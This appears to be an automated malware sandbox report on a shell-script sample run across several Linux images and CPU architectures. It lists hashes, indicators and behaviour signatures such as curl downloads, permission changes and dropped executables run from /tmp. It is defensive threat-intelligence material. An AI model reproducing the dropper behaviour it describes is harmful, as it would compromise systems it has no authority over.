Analysis
max time kernel
68s
max time network
71s
platform
debian-9_mips
resource
debian9-mipsbe-20240611-en
resource tags
arch:mips, image:debian9-mipsbe-20240611-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mips, system
submitted
18/10/2024, 01:37
Static task
static1
Behavioral task
behavioral1
Sample
478abb0b9204c38ac69d393af6856e148dc2bf803ddc7907625ae1ddda47e35d.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
478abb0b9204c38ac69d393af6856e148dc2bf803ddc7907625ae1ddda47e35d.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
478abb0b9204c38ac69d393af6856e148dc2bf803ddc7907625ae1ddda47e35d.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
478abb0b9204c38ac69d393af6856e148dc2bf803ddc7907625ae1ddda47e35d.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
478abb0b9204c38ac69d393af6856e148dc2bf803ddc7907625ae1ddda47e35d.sh
-
Size
10KB
-
MD5
c956e213cb8e0cd5b63267ab840c5dae
-
SHA1
c9c0189ae5a4b6a84cf8c69090e33e6cb8974836
-
SHA256
478abb0b9204c38ac69d393af6856e148dc2bf803ddc7907625ae1ddda47e35d
-
SHA512
903a8b0408d84cff6c5404beab29ca6b31d19c2f9cca4fce2d34ad6a66e57f53b049639da591e42a4587431c4ed65408d48533fac69dc8d799d48e89680297bd
-
SSDEEP
192:VLdU4cGZNPeGN6Gi9oMIiOtU4cUZNXeGN6Gym:NdU4cz9oMIiMU4cPm
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
File opened for reading /proc/sys/crypto/fips_enabled (process: curl)
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97